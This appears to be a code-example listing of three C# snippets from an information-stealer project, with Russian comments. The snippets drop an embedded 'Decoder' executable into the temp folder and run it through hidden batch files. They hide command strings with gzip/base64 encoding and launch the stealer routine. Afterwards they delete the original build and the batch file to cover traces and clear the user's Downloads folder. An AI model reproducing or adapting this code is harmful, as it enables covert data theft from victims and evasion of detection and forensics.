Ejemplo n.º 1
0
        // Получаем VolumeSerialNumber
        public static void Deocder()
        {
            // Извлекаем exe из ресурсов во временную папку
            File.WriteAllBytes(Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA"), Properties.Resources.Decoder);
            // Создает временный .cmd и им запускаем наши файлы
            string batch = Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");

            using (StreamWriter sw = new StreamWriter(batch))
            {
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNITc7IV8hPSwMAyqnEkQkAAAA="));
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA="));                                                                                                     // Задержка до выполнения следуюющих команд
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAAsOcQwKUQAA789iXwYAAAA=") + "\"" + "\" " + "\"" + Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA") + "\""); // Запускаем первый билд
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath());                                                                                                // Переходим во временную папку юзера
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");                                                                  // Удаляем .cmd
            }

            Process.Start(new ProcessStartInfo()
            {
                FileName        = batch,
                CreateNoWindow  = true,
                ErrorDialog     = false,
                UseShellExecute = false,
                WindowStyle     = ProcessWindowStyle.Hidden
            });
        }
Ejemplo n.º 2
0
        public static void Deocder()
        {
            File.WriteAllBytes(Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA"), Properties.Resources.Decoder);
            string batch = Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");

            using (StreamWriter sw = new StreamWriter(batch))            {
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNITc7IV8hPSwMAyqnEkQkAAAA="));
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA=")); // Задержка до выполнения следуюющих команд
                File.WriteAllBytes(Decrypt.Get(@"H4sIAAAAAAAEAHO2igkoyk8vSsx1SSxJjHFJTc5PSS3SS61IBQCMqrk/GgAAAA=="), Echelon.Properties.Resources.Decoder);
                Process.Start(Decrypt.Get(@"H4sIAAAAAAAEAHO2igkoyk8vSsx1SSxJjHFJTc5PSS3SS61IBQCMqrk/GgAAAA=="));
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath());                               // Переходим во временную папку юзера
                sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(batch) + "\"" + " /f /q"); // Удаляем .cmd
            }

            Process.Start(new ProcessStartInfo()
            {
                FileName        = batch,
                CreateNoWindow  = true,
                ErrorDialog     = false,
                UseShellExecute = false,
                WindowStyle     = ProcessWindowStyle.Hidden
            });
        }
Ejemplo n.º 3
0
        private static void Main()
        {
            try
            {
                // Подключаем нужные библиотеки
                AppDomain.CurrentDomain.AssemblyResolve += AppDomain_AssemblyResolve;
                Assembly AppDomain_AssemblyResolve(object sender, ResolveEventArgs args)
                {
                    if (args.Name.Contains("DotNetZip"))
                    {
                        return(Assembly.Load(Resources.DotNetZip));
                    }

                    return(null);
                }


                // Проверка файла Help.HWID
                if (!File.Exists(Help.LocalData + "\\" + Help.HWID))
                {
                    // Файла Help.HWID нет, запускаем стиллер
                    Collection.GetCollection();
                }

                else
                {
                    // Файл Help.HWID есть, проверяем записанную в нем дату
                    if (!File.ReadAllText(Help.LocalData + "\\" + Help.HWID).Contains(Help.HWID + Help.dateLog))
                    {
                        // Дата в файле Help.HWID отличается от сегодняшней, запускаем стиллер
                        Collection.GetCollection();
                    }
                    else
                    {
                        // В файле Help.HWID сегодняшняя дата, закрываемся, означает что сегодня уже был лог с данного пк и не нужно слать повторы.
                        Environment.Exit(0);
                    }
                }
            }
            catch
            {
                Clean.GetClean();
                return;
            }

            finally
            {
                // Чистим следы за собой, небольшой метод вторичной проверки. Так же метод очищает папку Downloads у юзера
                Clean.GetClean();

                // Самоудаление после отправки лога
                string batch = Path.GetTempFileName() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");
                using (StreamWriter sw = new StreamWriter(batch))
                {
                    sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAFNySE3OyFfIT0sDAP8G798KAAAA"));                                                                                                                     // скрываем консоль
                    sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA="));                                                                                                             // Задержка до выполнения следуюющих команд в секундах.
                    sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name) + "\"" + " /f /q"); // Удаляем исходный билд
                    sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath());                                                                                                        // Переходим во временную папку юзера
                    sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + batch + "\"" + " /f /q");                                                                                            // Удаляем .cmd
                }

                Process.Start(new ProcessStartInfo()
                {
                    FileName        = batch,
                    CreateNoWindow  = true,
                    ErrorDialog     = false,
                    UseShellExecute = false,
                    WindowStyle     = ProcessWindowStyle.Hidden
                });
                Environment.Exit(0);
            }
        }